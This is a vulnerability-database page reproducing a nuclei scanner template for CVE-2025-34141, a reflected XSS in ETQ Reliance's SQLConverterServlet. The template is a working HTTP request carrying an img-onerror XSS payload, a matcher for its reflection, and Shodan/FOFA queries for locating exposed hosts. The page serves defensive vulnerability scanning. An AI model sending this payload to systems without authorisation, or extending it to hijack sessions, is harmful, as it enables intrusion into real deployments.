Lucene search
K

ETQ Reliance - Reflected XSS via SQLConverterServlet

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Reflected XSS vulnerability in ETQ Reliance allowing script execution in user sessions, fixed in SE.2025.1.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-34141
22 Jul 202512:35
attackerkb
Circl
CVE-2025-34141
23 Jul 202506:46
circl
CNNVD
ETQ Reliance CG 安全漏洞
22 Jul 202500:00
cnnvd
CVE
CVE-2025-34141
22 Jul 202512:35
cve
Cvelist
CVE-2025-34141 ETQ Reliance CG < SE.2025.1 Reflected XSS in `SQLConverterServlet`
22 Jul 202512:35
cvelist
EUVD
EUVD-2025-22314
3 Oct 202520:07
euvd
NVD
CVE-2025-34141
22 Jul 202513:15
nvd
Positive Technologies
PT-2025-30412
22 Jul 202500:00
ptsecurity
RedhatCVE
CVE-2025-34141
24 Jul 202513:30
redhatcve
The Hacker News
⚡ Weekly Recap — SharePoint Breach, Spyware, IoT Hijacks, DPRK Fraud, Crypto Drains and More
28 Jul 202512:13
thn
Rows per page
id: CVE-2025-34141

info:
  name: ETQ Reliance - Reflected XSS via SQLConverterServlet
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  impact: |
    Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  classification:
    epss-score: 0.01907
    epss-percentile: 0.77269
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-34141
    cwe-id: CWE-79
    cpe: cpe:2.3:a:etq:reliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: etq
    product: reliance
    shodan-query: 'html:"ETQ Reliance"'
    fofa-query: 'body="ETQ Reliance"'
  tags: cve,cve2025,etq,reliance,xss,reflected-xss,vkev,vuln

flow: |
  http(1)
  if(template.path){
   http(2)
  } else {
   set("path","reliance")
   http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      - |
        GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and
# digest: 4b0a00483046022100b5b994ff937a69ce4cb09fa55e862114886a0ce61c00a3d18e05b2b48ca14e62022100ed2bec89b09305b24c713f6d1e752ebf47662f26a32cb82a98024ad327d0c1bc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 45.1
EPSS0.01907
SSVC
14